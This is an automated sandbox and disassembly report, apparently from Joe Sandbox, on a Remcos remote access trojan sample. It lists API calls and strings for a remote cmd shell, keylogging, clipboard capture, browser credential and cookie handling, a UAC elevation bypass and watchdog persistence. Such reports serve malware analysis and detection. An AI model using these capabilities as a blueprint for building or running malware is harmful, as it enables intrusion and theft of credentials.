                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B60,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  APIs
                                                                                                  • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                  • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                                  • CreatePipe.KERNEL32(00476CDC,00476CC4,00476BE8,00000000,004660CC,00000000), ref: 004057B6
                                                                                                  • CreatePipe.KERNEL32(00476CC8,00476CE4,00476BE8,00000000), ref: 004057CC
                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BF8,00476CCC), ref: 0040583F
                                                                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474FA0,004660D0,00000062,004660B4), ref: 004059E4
                                                                                                  • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                                  • CloseHandle.KERNEL32 ref: 00405A23
                                                                                                  • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                                  • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                                  • CloseHandle.KERNEL32 ref: 00405A45
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                  • String ID: @lG$@lG$@lG$@lG$@lG$SystemDrive$cmd.exe$kG$lG$lG$lG$lG
                                                                                                  • API String ID: 2994406822-3565532687
                                                                                                  APIs
                                                                                                  • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                                    • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EF0,?), ref: 0041C37D
                                                                                                    • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EF0,?), ref: 0041C3AD
                                                                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EF0,?), ref: 0041C402
                                                                                                    • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EF0,?), ref: 0041C463
                                                                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EF0,?), ref: 0041C46A
                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B60,00474EF0,00000000), ref: 00404B47
                                                                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B60,00474EF0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                                    • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                                    • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                    • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                    • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                  • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                                                                    • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                  • String ID: 8PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$hPG$hPG$hPG$hPG$open
                                                                                                  • API String ID: 1067849700-718893278
                                                                                                  APIs
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                    • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                  • String ID: (TG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$RG
                                                                                                  • API String ID: 3018269243-1913798818
                                                                                                  APIs
                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                  • API String ID: 1164774033-3681987949
                                                                                                  • Opcode ID: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                                                                                  • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                                  • Opcode Fuzzy Hash: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
• Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
APIs
• OpenClipboard.USER32 ref: 004168FD
• EmptyClipboard.USER32 ref: 0041690B
• GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
• GlobalLock.KERNEL32(00000000), ref: 00416934
• GlobalUnlock.KERNEL32(00000000), ref: 0041696A
• SetClipboardData.USER32(0000000D,00000000), ref: 00416973
• CloseClipboard.USER32 ref: 00416990
• OpenClipboard.USER32 ref: 00416997
• GetClipboardData.USER32(0000000D), ref: 004169A7
• GlobalLock.KERNEL32(00000000), ref: 004169B0
• GlobalUnlock.KERNEL32(00000000), ref: 004169B9
• CloseClipboard.USER32 ref: 004169BF
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
• String ID: !D@
• API String ID: 3520204547-604454484
• Opcode ID: f98e19e59eea15a91d3b71fa0c0f5b928df445f0179be6eeee7715d264c86d8b
• Instruction ID: 40a69bedac3bd734cdfdd6227e623399476ab8ebe6f0a7c245c4ec6d1d06efb6
• Instruction Fuzzy Hash: 16215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
• FindClose.KERNEL32(00000000), ref: 0040BE04
• FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
• FindClose.KERNEL32(00000000), ref: 0040BEEA
• FindClose.KERNEL32(00000000), ref: 0040BF0B
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Find$Close$File$FirstNext
• String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 3527384056-432212279
• Opcode ID: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
• Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
• Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750F4,?,00475348), ref: 0040F4C9
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475348), ref: 0040F4F4
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
• CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475348), ref: 0040F59E
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
• CloseHandle.KERNEL32(00000000,?,00475348), ref: 0040F6A9
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
• String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$RG
• API String ID: 3756808967-4270599879
• Opcode ID: 3acc3f55b6397cee36b7d5ef666cd78527c930f9b8fa3a8dd2be36fd150b4bf2
• Instruction ID: f7ffc7f0dfbd756cb6275d6ec2ba0be94116b78c8c9f611e281f0170cc986b4a
• Instruction Fuzzy Hash: 4C7130705083419AC724FB21D8559AEB7E4AF90348F40483FF586631E3EF79994DCB9A
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$1$2$3$4$5$6$7
• API String ID: 0-3177665633
• Opcode ID: 8290dbae049be2cdd206d8bf1c1fda6425e159576a2ff2ba4f12e613f6a6ac2b
• Instruction ID: 3c74f5afe55031bef20d6cb4aa2bc38f0c43463ce83be6e36937eb537edf8bdf
• Instruction Fuzzy Hash: CB71E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
APIs
• GetForegroundWindow.USER32 ref: 0040A451
• GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
• GetKeyboardLayout.USER32(00000000), ref: 0040A464
• GetKeyState.USER32(00000010), ref: 0040A46E
• GetKeyboardState.USER32(?), ref: 0040A479
• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
• ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A535
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
• String ID: (kG
• API String ID: 1888522110-2813241365
• Opcode ID: 31ed79bda99ad10420f5864c73503205d5e880a6a674e4152aa1d5376154a4ca
• Instruction ID: 3b9a32d10988b9101c987d3e8fcb44953e801c6634267c48ca941b3c69dca571
• Instruction Fuzzy Hash: F8316D72504308BFD700DFA0DC45F9B7BECAB88754F00083AB645D61A0D7B5E948CBA6
APIs
• _wcslen.LIBCMT ref: 0040755C
• CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Object_wcslen
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• API String ID: 240030777-3166923314
• Opcode ID: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
• Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
• Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758F8), ref: 0041A7EF
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
• GetLastError.KERNEL32 ref: 0041A84C
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: EnumServicesStatus$ErrorLastManagerOpen
• String ID:
• API String ID: 3587775597-0
• Opcode ID: ed2a484c9de4d8d7b702438badeb3b089465d79b2546f7b6bce90e1470cac3ef
• Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
• Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
APIs
• FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
• FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
• FindClose.KERNEL32(00000000), ref: 0040C4B8
• FindClose.KERNEL32(00000000), ref: 0040C4E3
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 1164774033-405221262
• Opcode ID: 5569ca3f5fbe7e4717efef4f34d69c98aa921a880cb4824fcc99a8611b97b131
• Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
• Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
APIs
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EF0,?), ref: 0041C37D
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EF0,?), ref: 0041C3AD
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EF0,?), ref: 0041C41F
• DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EF0,?), ref: 0041C42C
  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EF0,?), ref: 0041C402
• GetLastError.KERNEL32(?,?,?,?,?,00474EF0,?), ref: 0041C44D
• FindClose.KERNEL32(00000000,?,?,?,?,?,00474EF0,?), ref: 0041C463
• RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EF0,?), ref: 0041C46A
• FindClose.KERNEL32(00000000,?,?,?,?,?,00474EF0,?), ref: 0041C473
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
• String ID:
• API String ID: 2341273852-0
• Opcode ID: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
• Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
• Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
APIs
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
• SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
• GetLastError.KERNEL32 ref: 0040A328
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
• TranslateMessage.USER32(?), ref: 0040A385
• DispatchMessageA.USER32(?), ref: 0040A390
Strings
• Keylogger initialization failure: error , xrefs: 0040A33C
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
• String ID: Keylogger initialization failure: error
• API String ID: 3219506041-952744263
• Opcode ID: f6438d0ece582153da91c0d5bff560373b785e456ae076c588142eaef4cdec3b
• Instruction ID: bc7b44719e59224dfa2ccda8cade24f8ec1ba8a069f7aee67aec650331f950b6
                                                                                                  • Instruction Fuzzy Hash: 8911C131510301EBC710BB769C0986B77ACEB95715B20097EFC82E22D1FB34C910CBAA
APIs
• RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
• GetProcAddress.KERNEL32(00000000), ref: 004142AC
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: AddressCloseCreateLibraryLoadProcsend
• String ID: SHDeleteKeyW$Shlwapi.dll
• API String ID: 2127411465-314212984
• Opcode ID: f055ea799f88ac1a9188829ac7374e5e5a6c447f9263e09deb5da0b33bdbcfb9
• Instruction ID: cc57822c2a7f940fffebe33daf0632284ddc1748a3b8d5e961f42c670a34d5b4
• Opcode Fuzzy Hash: f055ea799f88ac1a9188829ac7374e5e5a6c447f9263e09deb5da0b33bdbcfb9
• Instruction Fuzzy Hash: D1B1F671A0430066CA14BB76DC579AF36A89F91748F40053FB906671E2EE7D8A48C6DA

APIs
  • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
  • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
  • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
  • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
  • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
• ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
• LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
• GetProcAddress.KERNEL32(00000000), ref: 004168AD
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
• String ID: !D@$PowrProf.dll$SetSuspendState
• API String ID: 1589313981-2876530381
• Opcode ID: d444d066f4fdad4d35a34b464d43113e8d04464aaad5ec9ebe6089587c88fb6e
• Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
• Opcode Fuzzy Hash: d444d066f4fdad4d35a34b464d43113e8d04464aaad5ec9ebe6089587c88fb6e
• Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E

APIs
  • Part of subcall function 00413584: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 004135A4
  • Part of subcall function 00413584: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004135C2
  • Part of subcall function 00413584: RegCloseKey.ADVAPI32(00000000), ref: 004135CD
• Sleep.KERNEL32(00000BB8), ref: 0040F896
• ExitProcess.KERNEL32 ref: 0040F905
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CloseExitOpenProcessQuerySleepValue
• String ID: 5.2.0 Pro$override$pth_unenc$RG
• API String ID: 2281282204-1448307011
• Opcode ID: 859d382c5514675a88dbfd2b01b2139d6cc1a97d42f31d021ecf9ff28bd1814e
• Instruction ID: 0454f1d730b8de97e77b6af0221289a353f5645d6d0bcfbcd4472c6607f37e61
• Opcode Fuzzy Hash: 859d382c5514675a88dbfd2b01b2139d6cc1a97d42f31d021ecf9ff28bd1814e
• Instruction Fuzzy Hash: 7421E171B0420127D6087676885B6AE399A9B80708F50453FF409672D6FF7C8E0483AF

APIs
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
• InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
• InternetCloseHandle.WININET(00000000), ref: 0041B4AD
• InternetCloseHandle.WININET(00000000), ref: 0041B4B0
Strings
• http://geoplugin.net/json.gp, xrefs: 0041B448
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleOpen$FileRead
• String ID: http://geoplugin.net/json.gp
• API String ID: 3121278467-91888290
• Opcode ID: 44e3eb189f55cf6f1ed07d44a413c9c9411299a25c39c7d3ec484e6895d2650c
• Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
• Opcode Fuzzy Hash: 44e3eb189f55cf6f1ed07d44a413c9c9411299a25c39c7d3ec484e6895d2650c
• Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA

APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
• GetLastError.KERNEL32 ref: 0040BA93
Strings
• [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
• UserProfile, xrefs: 0040BA59
• \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
• [Chrome StoredLogins not found], xrefs: 0040BAAD
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
• API String ID: 2018770650-1062637481
• Opcode ID: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
• Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
• Opcode Fuzzy Hash: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
• Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE

APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
• OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
• GetLastError.KERNEL32 ref: 004179D8
Strings
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3534403312-3733053543
• Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
• Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
• Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
• Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5

APIs
• __EH_prolog.LIBCMT ref: 00409293
  • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
